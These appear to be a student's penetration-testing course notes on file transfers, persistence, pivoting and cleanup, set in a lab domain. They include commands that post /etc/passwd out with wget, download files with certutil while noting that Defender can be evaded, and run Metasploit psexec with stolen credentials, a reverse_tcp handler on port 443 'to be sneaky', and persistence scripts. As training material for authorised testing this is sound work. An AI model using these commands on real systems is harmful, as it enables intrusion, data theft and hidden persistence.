Week 11: File Transfers, Pivoting, Reporting

File Transfers, Pivoting, Report Writing, and Career Advice

Maintaining Access / Pivoting / Cleanup - This lesson will discuss methods of maintaining access on a network, pivoting into other networks, and how to properly clean up as you exit a network. The Legal Side of the House - This lesson will cover the important legal aspects that a pentester must know prior to conducting a penetration test. For example, having a rules of engagement document that specifies which networks can be attacked and what attack methods can be used. Knowing the common legal documents that a junior pentester may encounter will give him or her an advantage in their early careers. Report Writing - This lesson will cover the importance of report writing in penetration testing and walk through what should be included in a penetration test report. A demo penetration test report will be provided that will cover many of the findings that we have discussed in prior chapters. This will provide students with a clear understanding of what is expected on a penetration test report and how to write on effectively.

File Transfers


python -m SimpleHTTPServer 80
# OR
python3 -m http.server 80
python -m pyftpdlib -p 21 # FTP

wget http://<ip>:80/secrets.txt
nc -nvlp <port> file # redirect into new file
## nc
nc <ip> <port> < file
## wget, receiver has to clean the file
wget --post-file=/etc/passwd
tail -n +10 file > clean_file # delete transfer data


# Windows Defender can block this, though there are ways to split files to bypass
C:\Users\fcastle>certutil -rulcache -f http://<ip>/secrets.txt secrets.txt

C:\Users\fcastle>ftp <ip>
ftp> get <file>


msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt

Maintaining Access

Persistence is dangerous and usually unnecessary for junior-mid level pentesting (time limited engagements, not red teaming). It opens a port on a machine with no credentials--leaves it wide open for a future attack. You'll have to go back in and delete the service and remove it from the registry. It'll give you an RC file to go in and delete the files for you, but it's generally dangerous and unnecessary.

Persistence Scripts

meterpreter > run persistence -h

If you want to get a meterpreter shell back:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost

Scheduled Tasks

run scheduleme
run schtaskabuse


run metsvc -A


Gained access to a machine on the 192 network that is dualhomed with the 10 network (just need two NICs, or network adapters in VBox).

# Check for other networks, besides ipconfig
route print
arp -a

Scanning on a pivot is incredibly slow, but:

use auxiliary/scanner/portscan/tcp


The cleanup process covers the requirements for cleaning up systems once the penetration test has been completed, not removing logs, etc. This will include all user accounts and binaries used during the test.

  • Remove all executable, scripts and temporary file from a compromised system. If possible use secure delete method for removing the files and folders.

  • Return to original values system settings and application configuration parameters if they where modified during the assessment.

  • Remove all backdoors and/or rootkits installed.

  • Remove any user accounts created for connecting back to compromise systems.

Report Writing

Career Advice

Last updated